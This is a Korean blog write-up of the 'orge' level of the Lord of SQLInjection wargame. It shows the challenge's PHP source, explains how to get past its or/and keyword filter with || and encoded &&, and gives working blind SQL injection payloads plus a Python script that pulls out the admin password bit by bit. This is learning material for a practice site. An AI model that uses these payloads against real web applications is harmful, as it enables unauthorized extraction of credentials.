IT보안관의 공부 클라우드

[los]orge 본문

워게임/los

[los]orge

ㅡㅡㅡㅡㄷ 2021. 5. 25. 18:41

query : select id from prob_orge where id='guest' and pw='' 

<?php 
  include "./config.php"; 
  login_chk(); 
  $db = dbconnect(); 
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~"); 
  if(preg_match('/or|and/i', $_GET[pw])) exit("HeHe"); 
  $query = "select id from prob_orge where id='guest' and pw='{$_GET[pw]}'"; 
  echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id']) echo "<h2>Hello {$result[id]}</h2>"; 
   
  $_GET[pw] = addslashes($_GET[pw]); 
  $query = "select pw from prob_orge where id='admin' and pw='{$_GET[pw]}'"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("orge"); 
  highlight_file(__FILE__); 
?>


1.preg_match : prob + . ( )
2.preg_match : or and
3.addslashes
※()를 preg_match로 탐지하는데 함수 사용이 왜 가능?


blind sql injection 문제이다.
query : select id from prob_orge where id='guest' and pw='a' || '1'='1'
Hello guest 출력 됨.

%26은 & 우회. &은 파라미터 구분자로 사용되기 때문에 인코딩 필수.
※파이선 코드로 작성시 && 사용
pw=a' || 1=1 %26%26 id='admin' %26%26 length(pw)='8
https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php?pw=a%27%20||%201=1%20%26%26%20id=%27admin%27%20%26%26%20length(pw)=%278
Hello admin
pw=a' || 1=1 %26%26 id='admin' %26%26 length(pw)='8

 


substr ascii bin lpad 를 이용하여 2진수 값으로 변환한 후 substr을 이용해 이진수의 자리수 마다 비교하여 8번의 비교로 1글자를 알아내는 기법.
https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php?pw=a' || 1=1 %26%26 id='admin' %26%26 substr(lpad(bin(ascii(substr(pw,1,1))),8,0),1,1) = '1

대략적인 for문
for i in range(1,9)
for j in range(1,9)
if(substr(lpad(bin(ascii(substr(pw,i,1))),8,0),j,1))
a=a+1
else 
a=a+0
b.append(a)

파이썬 코드

#orge BlindSqlInjection

import requests
#from itertools import product

chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789~!@#$%^&*'
pw_list = list()
pw_str = str()
url = 'https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php'
cookies = {'PHPSESSID':'7cu8mcoov0uo0qirli9sk9d38j'}
for i in range(1,9):
    pw=str()
    for j in range(1,9):
        param={'pw':"a' || 1=1 && id='admin' && substr(lpad(bin(ascii(substr(pw,"+str(i)+",1))),8,0),"+str(j)+",1) = '1"}
        res=requests.get(url,cookies=cookies,params=param,verify=False)
        res_text=res.text
        print(res_text)
        if "Hello admin" in res_text:
            pw=pw+'1'
        else:
            pw=pw+'0'
    pw_list.append(pw)
    print(pw_list)
for a in pw_list:
    b=int('0b'+a,2)
    pw_str= pw_str+chr(b)
print("PW:"+pw_str)

 

저작자표시 비영리

'워게임 > los' 카테고리의 다른 글

[los]vampire  (0) 2021.06.01
[los]troll  (0) 2021.05.28
[los]darkelf  (0) 2021.05.21
[los]wolfman  (0) 2021.05.17
[los]orc  (0) 2021.03.25
'워게임/los' Related Articles more
Comments